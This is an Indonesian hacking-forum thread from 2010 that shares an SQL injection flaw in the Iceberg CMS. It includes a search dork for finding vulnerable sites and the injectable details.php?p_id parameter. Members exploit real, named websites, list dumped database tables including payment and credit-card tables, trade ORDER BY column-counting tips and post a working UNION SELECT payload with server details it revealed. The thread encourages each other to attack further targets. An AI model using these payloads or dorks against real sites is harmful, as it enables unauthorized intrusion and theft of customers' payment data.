[Bug]SQL injection pada iceberg 'Content Management System'

Post by **poni** » Thu May 27, 2010 8:09 pm

The iceberg 'Content Management System' SQL Injection Vulnerability
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : by cyberlog
Published : 27.05.2010
Affected Software : imagetraders:iceberg_cms

==========================================================
The iceberg 'Content Management System' SQL Injection Vulnerability
==========================================================

# The iceberg 'Content Management System' SQL Injection Vulnerability
# Homepage : http://www.imagetraders.com.au
# Discovered : by cyberlog
# Dork : details.php?p_id= 'Design & SEO by Image Traders Pty Ltd'
# Exploit : http://[target]/details.php?p_id=[SQL Injection]
# Thanks : r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz,

jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiL
L SarifJedul,wiro gendeng,Letjen,ridho_bugs,Ryan
Kabrutz,Mathewsa.k.a Nyubicrew
# My Site : http://sekuritionline.net
# Channel : #sekuritionline
#special to Mama Sri Rahayu, Member& Staff Sekuritonline, C0li a.k.a
antisecurity [ pinjem script perl-na ]

,
Inj3ct0r Now Brothers with Sekuritionline
==============================================
We never die !!!! indonesian Underground Community
KacrUt I L0v3 U

Give me NOCAN Brothers

am nt hacker just Lik3 Syst3m S3curity

References :
http://xforce.iss.net/xforce/xfdb/58617
http://www.vupen.com/english/advisories/2010/1161
http://www.osvdb.org/64694
http://www.exploit-db.com/exploits/12620
http://secunia.com/advisories/39833
http://packetstormsecurity.org/1005-exp ... rg-sql.txt

baidhowi · Post by **baidhowi** » Thu May 27, 2010 8:18 pm

idih bang poni emg kga ada matinya daah :love:

thanks pak

Post by **poni** » Thu May 27, 2010 8:21 pm

Diatas adalah salah satu bug sql injection yang ditemukan oleh cyberlog dari forum saudara kita sekuritionline, pada produk CMS imagetrader milik iceberg. sebagai POC, mari lihat web dibawah ini:

Code: Select all

http://www.wielandhelicopters.com.au/details.php?p_id=62'

dan setelah dicek, ditemukan:

Code: Select all

database = wiehel1_wielandhelicopters0com0au

dan terdiri dari tabel
e_c 	
e_cc 	
e_answer 	
e_account_payment 	
db_backup 	
cover 	
cost_title 	
cost_sub_title 	
cost_detail 	
content_template 	
content_option 	
content_config 	
contact_thank 	
contact_show 	
contact_paragraph 	
contact_page 	
contact_location 	
contact_field 	
contact 	
colour_font_help 	
cms_user_type 	
cms_user_group 	
cms_plugin_option 	
cms_plugin 	
client_secondary 	
client_pdf_folder 	
client_pdf 	
client_note 	
client_image 	
client_file 	
client_enquiry 	
client_category_email 	
client_category 	
client 	
cli_enquiry_answer 	
cli_enquiry 	
cart_product 	
cart_payment_type 	
cart_payment_paypal 	
cart_payment_cc 	
cart_payment_bankdep 	
cart_payment 	
cart_option 	
cart_history 	
cart_config 	
cart 	
calendar_users 	
calendar_property 	
calendar_param 	
calendar_link 	
calendar_info_day 	
calendar_info 	
calendar_events 	
calendar_content 	
calendar_cat 	
business_location 	
booking_travellers 	
booking_package 	
booking_note 	
booking_meal 	
booking_item 	
booking_files 	
booking_fees 	
booking_email 	
booking 	
bo_paragraph 	
bo_help_plugin_paragraph 	
bo_help_option_paragraph 	
banner_image 	
banner 	
as_group 	
as_field 	
as_answer 	
agents

Selanjutnya silahkan anda pelajari sendiri.

shinichi81 · Post by **shinichi81** » Thu May 27, 2010 10:39 pm

Injin dipelajari Kk poni........

Post by **3xtr3m3b0y** » Fri May 28, 2010 7:04 am

poni wrote: dan setelah dicek, ditemukan:

Code: Select all

database = wiehel1_wielandhelicopters0com0au

dan terdiri dari tabel	
cart_product 	
cart_payment_type 	
cart_payment_paypal 	
cart_payment_cc 	
cart_payment_bankdep 	
cart_payment 	
cart_option 	
cart_history 	
cart_config

Oh tidaaakkk... :pusing:
Ya Tuhan kuatkanlah hatiku...

Nice share Master PONI... :love:

Post by **peniru** » Fri May 28, 2010 2:05 pm

mantap kk, ijin eksplorasi :love: :love:

Post by **peniru** » Fri May 28, 2010 2:57 pm

ane baru dapet kek bgini....
http://www.target.com.au/details.php?p_id=269 order by 1-- (no error)
tp kalo gini
http://www.target.com.au/details.php?p_id=269 order by 2-- (kok error yah)

mohon pencerahannya :mati: :mati:

iwan · Post by **iwan** » Fri May 28, 2010 3:00 pm

santapan lezattttt.. :tapa: :tapa:

huwahahaha.. :ngakak: :ngakak:

Post by **peniru** » Fri May 28, 2010 3:37 pm

hwa akhirna berhasil nemu satu.... hanya dengan memperhatikan jenis error saja jumlah colom bisa ketemu :devil :devil

Code: Select all

URL:http://www.imagetraders.com.au/details.php?p_id=-1+union+all+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
[+] Evasion Used: "+" "--"
[+] 15:32:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: imatra_imagetraders0com0au
	User: imatra_cms@localhost
	Version: 5.0.90-community

CMIIW :love: :love:

abit doang · Post by **abit doang** » Sat May 29, 2010 8:56 pm

nice,...
hajar pake fuzz aja ah,..
maklum nubi...
:tapa:

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

[Bug]SQL injection pada iceberg 'Content Management System'

[Bug]SQL injection pada iceberg 'Content Management System'

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Re: [Bug]SQL injection pada iceberg 'Content Management Syst